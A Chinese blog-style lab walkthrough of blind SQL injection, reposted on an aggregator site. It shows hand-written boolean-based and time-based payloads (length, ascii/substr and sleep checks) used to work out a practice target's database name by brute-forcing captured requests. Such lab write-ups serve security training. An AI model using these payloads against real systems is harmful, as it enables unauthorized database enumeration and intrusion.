欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 锐评 > SQL注入-盲注靶场实战(手写盲注payload)--SRC获得库名即可

SQL注入-盲注靶场实战(手写盲注payload)--SRC获得库名即可

2025/5/16 9:31:55 来源:https://blog.csdn.net/m0_74317362/article/details/147030363  浏览:    关键词:SQL注入-盲注靶场实战(手写盲注payload)--SRC获得库名即可

布尔盲注

进入页面

在这里插入图片描述

注入点


在这里插入图片描述

and 1=1
在这里插入图片描述

and 1=2
在这里插入图片描述
得知为布尔盲注

库名长度

and length(database()) = 8

抓包(浏览器自动进行了url编码)爆破在这里插入图片描述

得知为 12
在这里插入图片描述

库名字符

1 and ascii(substr(database(),1,1))=112 – q

(这里如果不再次抓包,需要对上述payload进行url编码)
在这里插入图片描述

第二处是32-126(可打印ASCII字符范围)

在这里插入图片描述

在线编码解码
在线去除空格

kanwolongxia

时间盲注

注入点

1" and sleep(5) – q
在这里插入图片描述

转圈圈,响应延时了,得知为时间盲注

库名长度

1" and if((length(database())=33),sleep(10),0) – q

抓包,爆破
在这里插入图片描述

从响应时长可以得知:12
在这里插入图片描述

库名字符

1" and if((ascii(substr(database(),1,1))=112),sleep(10),0) – q

在这里插入图片描述

kanwolongxia

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词